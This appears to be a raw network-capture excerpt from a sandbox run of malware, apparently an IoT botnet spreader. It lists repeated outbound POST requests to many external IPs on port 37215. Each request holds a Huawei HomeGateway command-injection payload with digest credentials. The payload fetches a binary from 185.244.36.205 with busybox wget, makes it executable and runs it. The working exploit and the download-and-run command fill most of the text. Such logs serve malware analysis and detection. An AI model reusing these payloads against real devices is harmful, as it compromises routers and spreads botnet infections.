                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2413192.168.2.1544292157.61.249.10037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475811958 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2414192.168.2.155775231.180.18.10437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475832939 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2415192.168.2.1548894222.203.227.11237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475853920 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2416192.168.2.154347641.197.89.17337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475891113 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2417192.168.2.155740241.67.145.13237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475902081 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2418192.168.2.155769431.195.56.14537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475914955 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2419192.168.2.1558312138.64.137.22137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475934982 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2420192.168.2.154226241.12.228.18937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475946903 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2421192.168.2.1549560102.65.87.1037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475970984 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2422192.168.2.1535884157.13.220.14837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475980997 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2423192.168.2.1557042186.158.16.14937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476005077 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
